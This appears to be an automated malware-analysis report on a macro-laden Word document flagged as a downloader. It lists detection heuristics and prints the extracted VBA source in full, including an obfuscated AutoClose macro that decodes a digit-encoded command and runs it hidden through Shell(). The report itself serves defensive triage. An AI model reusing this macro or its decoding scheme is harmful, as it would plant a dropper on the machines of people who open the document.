MALICIOUS
244
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample is identified as malicious by ClamAV with the signature Doc.Malware.Emooodldr-6711604-0. It contains VBA macros, including an Auto_Close macro, which utilizes the Shell() function to execute a payload. The script attempts to download and run a second-stage payload, indicated by the use of Shell() and the embedded, albeit truncated, string that likely represents a command or URL.
Heuristics 6
-
ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2273 bytes |
SHA-256: 8b2d1d1c707186efeaa5b5dc57db1fc64fb20ffc3fa03d08ff31cefb77f1f1ac |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function riciclato(piattino As Integer) As String
Dim peccato() As Variant
peccato = Array("k", "d", ".", "A", "C", "a", "l", "W", "t", "o", "j", "S", ")", "/", "h", "p", "\", "y", "g", "v", "r", "J", ":", "f", "P", "i", "m", "=", "O", "-", "B", "w", "c", "s", ",", "N", " ", "E", "F", "?", "Q", "D", "n", "+", "'", "T", "b", "$", "(", ";", "x", "e")
Dim satellite As Integer
For satellite = LBound(peccato) To UBound(peccato)
If satellite = piattino Then
riciclato = peccato(satellite)
End If
Next
End Function
Function uncinetto(brodo As String)
brodo = StrConv(brodo, vbUnicode)
uncinetto = Split(Left(brodo, Len(brodo) - 1), vbNullChar)
End Function
Function estonia(ampliare As String) As String
Dim inter As Integer
Dim passivo As String
Dim eclissi As Variant
eclissi = uncinetto(Trim(ampliare))
For satellite = 0 To Len(ampliare)
If (satellite + 1) <= UBound(eclissi) Then
Dim ambrato As String
ambrato = eclissi(satellite)
satellite = satellite + 1
ambrato = ambrato + eclissi(satellite)
passivo = passivo + riciclato(Int(ambrato))
End If
Next
estonia = passivo
End Function
Public Function tentacolo(satellite As String)
Shell satellite, 0
End Function
Sub AutoClose()
Call Application.Run("tentacolo", estonia("32260102515051361332361509315120331451060636293750513236301715053333362935092436290409262605420136483551312928461051320836111733085126023551080207514604062551420812024109314206090501382506514844140808152213130900105125420826090809203317023209261342254209132605202509180226012344343647514219220324244103450336433644164017083803210251505144124936110805200829242009325133333647514219220324244103450344164017083803210251505144493648355131292846105132083611173308512602355108020751460406255142081202410931420609050111082025421848441408081522131309001051254208260908092033170232092613330215141539250127260520250918441249"))
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 11776 bytes |
SHA-256: 6864495207ef77277ea89eb561a4719fc8503fe39dbc3e51703fc9dce91eb3fc |
|||
|
Detection
ClamAV:
Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.